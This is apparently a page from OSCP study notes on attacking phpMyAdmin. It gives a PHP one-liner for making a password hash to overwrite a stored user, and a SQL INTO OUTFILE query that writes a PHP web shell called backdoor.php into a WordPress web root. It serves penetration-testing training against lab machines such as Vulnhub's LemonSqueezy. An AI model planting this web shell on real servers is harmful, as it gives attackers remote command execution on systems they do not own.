OSCP 2022 Materials

⌘Ctrlk

PHPMyAdmin

Requires: Credentials to login

Password Alteration

Change the password hash of the stored user - IPPSEC

php -a
echo password_hash('dnoscp', PASSWORD_DEFAULT);

RCE via SQL

SQL into outfile wirte method leads to SHELL ( change the outfile based on CMS )

SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/wordpress/backdoor.php"

Machine:

LemonSqueezy:1 Vulnhub WalkthroughHacking Articles

PreviousDrupal NextKerberos

Last updated 3 years ago